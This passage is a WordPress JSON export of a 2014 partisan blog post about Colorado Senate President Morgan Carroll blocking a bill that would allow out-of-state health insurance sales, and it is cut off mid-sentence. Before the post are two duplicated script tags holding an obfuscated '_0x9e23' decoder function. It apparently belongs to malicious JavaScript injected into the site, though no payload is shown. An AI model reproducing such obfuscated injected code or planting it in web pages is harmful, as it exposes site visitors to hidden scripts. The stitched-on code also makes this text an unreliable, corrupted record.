<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}</script>{"id":2849,"date":"2014-01-14T16:43:27","date_gmt":"2014-01-14T23:43:27","guid":{"rendered":"http:\/\/www.jsharf.com\/view\/?p=2849"},"modified":"2014-01-14T16:43:27","modified_gmt":"2014-01-14T23:43:27","slug":"what-does-morgan-carroll-have-against-middle-class-health-insurance","status":"publish","type":"post","link":"https:\/\/www.jsharf.com\/view\/?p=2849","title":{"rendered":"What Does Morgan Carroll Have Against Middle-Class Health Insurance?"},"content":{"rendered":"<p>Democrat State Senate President Morgan Carroll is preparing to kill, for the second time in her legislative career, a bill that would provide Coloradans greater choice and lower cost in health insurance.\u00a0 She has assigned to the so-called \u201cKill Committee\u201d Senator Greg Brophy\u2019s (R-Wray) bill that would permit out-of-state health insurance purchases for Colorado residents.\u00a0 The \u201cKill Committee\u201d is the State, Veterans, and Military Affairs Committee, which is stocked with reliable partisans of the majority party, who can be counted on to vote down unpopular legislation without its having to be assigned to a relevant committee of record.<\/p>\n<p>Brophy\u2019s stated hope is that somewhere, some insurance company will figure out how to offer an affordable plan, and that Coloradoans should be able to buy such a plan.<\/p>\n<p>The idea has been offered before, both in Colorado and in other states, and it faces an uphill battle.<\/p>\n<p>The National Conference of State Legislatures has\u00a0<a href=\"http:\/\/www.ncsl.org\/research\/health\/out-of-state-health-insurance-purchases.aspx\" target=\"_blank\">compiled a list of similar state legislative efforts<\/a>\u00a0over the last few years, including some since Obamacare was passed. \u00a0This bill most closely resembles a law passed in Georgia, which\u00a0<a href=\"http:\/\/www.legis.ga.gov\/Legislation\/en-US\/display\/20112012\/HB\/47\" target=\"_blank\">permits out-of-state insurers to issue policies<\/a>\u00a0in that state.<\/p>\n<p>A similar bill, HB08-1327, \u00a0was\u00a0introduced in Colorado in the 2008 legislative session. \u00a0It was killed\u00a0in Business and Labor Affairs, with then-Representative, now-Senate President Morgan Carroll casting the deciding vote against. \u00a0It would have permitted out-of-state insurers to sell here, regardless of whether they met the in-state licensing requirements. \u00a0By contrast, SB14-040 would require out-of-state insurers to meet licensing requirements for doing business in Colorado. \u00a0However, neither bill requires insurance policies to carry all of the individually mandated items that\u00a0<a href=\"http:\/\/www.businessword.com\/index.php\/weblog\/comments\/mandated_health_benefits_in_colorado_increase_the_cost_of_health_insurance_\" target=\"_blank\">may raise the cost of health insurance here in Colorado<\/a>\u00a0by as much as 50%.<\/p>\n<p>At the time, objections were raised that no interstate compact had been attempted;
